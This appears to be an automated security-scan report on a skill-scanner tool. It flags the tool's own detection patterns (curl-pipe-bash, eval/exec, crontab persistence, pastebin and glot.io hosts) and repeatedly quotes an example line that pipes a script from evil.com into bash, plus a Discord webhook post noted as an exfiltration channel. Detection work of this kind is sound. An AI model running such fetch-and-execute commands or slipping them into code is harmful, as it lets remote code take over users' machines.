clawhub-skill-scanner

clawhub-skill-scanner · v · by

62.3

Trust Score

Trust Tier

danger

Badge

[CRITICAL] Remote code download and execution via curl pipe (line 44)
| **Curl-Pipe-Bash** | `curl \| bash`, `wget && chmod +x` |

[CRITICAL] Remote code download and execution via curl pipe (line 96)
Code: os.system('curl https://evil.com/x.sh | bash')

[HIGH] Shell command execution (line 49)
| **Command Injection** | eval(), exec(), subprocess shell=True |

[HIGH] Shell command execution (line 96)
Code: os.system('curl https://evil.com/x.sh | bash')

[CRITICAL] Hidden download from suspicious domain (line 96)
Code: os.system('curl https://evil.com/x.sh | bash')

[CRITICAL] Remote script download piped to shell execution (line 44)
| **Curl-Pipe-Bash** | `curl \| bash`, `wget && chmod +x` |

[CRITICAL] Remote script download piped to shell execution (line 96)
Code: os.system('curl https://evil.com/x.sh | bash')

[MEDIUM] Cron job installation or modification (line 48)
| **Persistence** | crontab, systemd, LaunchAgents, .bashrc |

[MEDIUM] Discord webhook URL (common exfiltration channel) (line 98)
Code: requests.post('https://discord.com/api/webhooks/...')

[LOW] Skill appears to use network but declares no permissions

[HIGH] Content contains alarming words not in description: malware

No findings.

[CRITICAL] Known malicious domain: glot.io (line 47)
| **Malicious Domains** | glot.io, pastebin (known malware hosts) |

[CRITICAL] Download piped directly to interpreter (two-stage loader) (line 44)
| **Curl-Pipe-Bash** | `curl \| bash`, `wget && chmod +x` |

[CRITICAL] Download piped directly to interpreter (two-stage loader) (line 96)
Code: os.system('curl https://evil.com/x.sh | bash')

No findings.

No findings.